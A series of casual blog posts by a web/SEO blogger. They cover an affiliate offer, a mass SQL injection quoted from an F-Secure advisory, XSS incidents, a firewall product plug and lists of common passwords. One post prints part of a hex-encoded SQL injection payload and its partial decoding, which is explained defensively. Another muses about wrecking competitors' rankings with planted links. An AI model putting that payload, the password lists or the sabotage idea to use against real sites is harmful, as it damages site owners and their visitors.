wow things are moving Fast, I think that the recent wordpress exploits helped and the fact we where just on Techcrunch can’t harm either, so the affiliate program we are going to give you $19.99 USD Just for signing up to the Affiliate Program

Commissions will be a Pay-Per-Sale $40.00 USD for each sale you deliver. Minimum balance required for payout is $100 USD

any issues or Information just drop me a line

DaveN
Payments are made once per month, for the previous month.

That’s what just happened, a massive SQL Injection was discovered on F-secure, hat tip to 0×000000 I found it there, I wonder how many peoples computers just got malware on them.

But imagine in a controlled manner you could either destroy websites ranking by adding 50,000 links to all your competitors.

From F-secure,

Unless that data is sanitized before it gets saved you can’t control what the website will show to the users. This is what SQL injection is all about, exploiting weaknesses in these controls. In this case the injection code starts off like this (note, this is not the complete code):

DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0×440045004300
4C00410052004500200040005400200076006100720063006800610072
00280032003500350029002C0040004300200076006100720063006800
610072002800320035003500290020004400450043004C004100520045
0020005400610062006C0065005F0043007500720073006F0072002000
43005500520053004F005200200046004F0052002000730065006C0065
0063007400200061002E006E0061006D0065002C0062002E006E006100
6D0065002000660072006F006D0020007300790073006F0062006A0065
00630074007300200061002C0073007900730063006F006C0075006D00
6E00730020006200200077006800650072006500200061002E00690064
003D0062002E0069006400200061006E006400200061002E0078007400
7900700065003D00270075002700200061006E0064002000280062002E
00780074007900700065003D003900390020006F007200200062002E00
780074007900700065003D003300350020006…

Which when decoded becomes:

DECLARE @T varchar(255)’@C varchar(255) DECLARE Table_Cursor
CURSOR FOR select a.name’b.name from sysobjects a’syscolumns b
where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35
or b…

What happens as a result? It finds all text fields in the database and adds a link to malicious javascript to each and every one of them which will make your website display them automatically. So essentially what happened was that the attackers looked for ASP or ASPX pages containing any type of querystring (a dynamic value such as an article ID, product ID, et cetera) parameter and tried to use that to upload their SQL injection code.

is this a good time to mention Firewall Script again

Dave

Ok one of my wifes favourite sayings at the moment is “busy idiots”, basically you are busy all the time but never focused enough to get things done. I have been looking at different open source solutions to stop 0 day expoilts, XSS hacks , and in fairness there are quite a few open source products out there, but the time and effort setting them up is just crazy, so I have decided to do a deal with Firewall Script. We are going to be including it in all our new wordpress client installs, I really like this product a lot, it’s easy to install and set up, so easy Dan almost did it here .. lol..

Anyway I want your points of view on it, the cost is just over £40, is it worth it? I mean have you ever tried to install modsecurity on a shared hosting platform?

Dave

well it was an XSS exploit in the community section of Barack Obama’s site the exploit redirected users to Hillary Clinton’s, I guess it could have been worse it could have just downloaded Malware.

How can such high profile sites keep getting hacked, come on web masters firewall up !!

DaveN

I just had a client send me a password, which I have told them they need to change, what made me laugh was Becky my wife said “it’s better than the old password” which was password .. lol, then that reminded me of the top 10 passwords ..
darkreading had these top 10 passwords :

1. (username)
2. (username)123
3. 123456
4. password
5. 1234
6. 12345
7. passwd
8. 123
9. test
10. 1

Threadwatch had in 2007

1. password
2. 123456
3. qwerty
4. abc123
5. letmein
6. monkey
7. myspace1
8. password1
9. blink182
10. (your first name)

modern life is rubbish has a UK List in 2006 :

1. 123
2. password
3. liverpool
4. letmein
5. 123456
6. qwerty
7. charlie
8. monkey
9. arsenal
10. thomas

But across europe the top 10 is still

1. Password
2. 12345
3. Football Club
4. Partners Name
5. letmein
6. Monkey
7. Own name
8. 1234
9. Qwerty
10. First school or Colour

and people wonder why their Blogs get hacked !!

DaveN

Thanks to the Hacker Webzine. 0×000000.com they posted Up a video presentation by Johnny Long

seriously check it out in your lunch hour … So funny and yet so TRUE ! Video here if you don’t know who Johnny Long is shame on you he did the google hacking database

DaveN